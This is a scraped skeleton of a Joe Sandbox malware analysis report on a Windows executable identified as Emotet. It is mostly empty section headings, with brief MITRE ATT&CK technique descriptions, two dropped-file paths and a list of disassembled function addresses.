Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DVvzRulsoR.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Windows Analysis Report
DVvzRulsoR.exe

Function 00007FFA09503FB0 Relevance: 2283.0, APIs: 11, Strings: 1292, Instructions: 2747
COMMONCrypto

Function 0000000180004DDC Relevance: 7.8, Strings: 6, Instructions: 338
COMMON

Function 0000000180028C94 Relevance: 6.5, Strings: 5, Instructions: 249
COMMON

Function 0000000180005DB4 Relevance: 6.4, Strings: 5, Instructions: 189
COMMON

Function 00000001800248E0 Relevance: 5.9, Strings: 4, Instructions: 869
COMMON

Function 00000001800038A5 Relevance: 5.2, Strings: 4, Instructions: 197
COMMON

Function 00007FFA094F4194 Relevance: 18.1, APIs: 12, Instructions: 133
COMMON

Function 00007FFA094F1580 Relevance: 10.6, APIs: 7, Instructions: 78
COMMON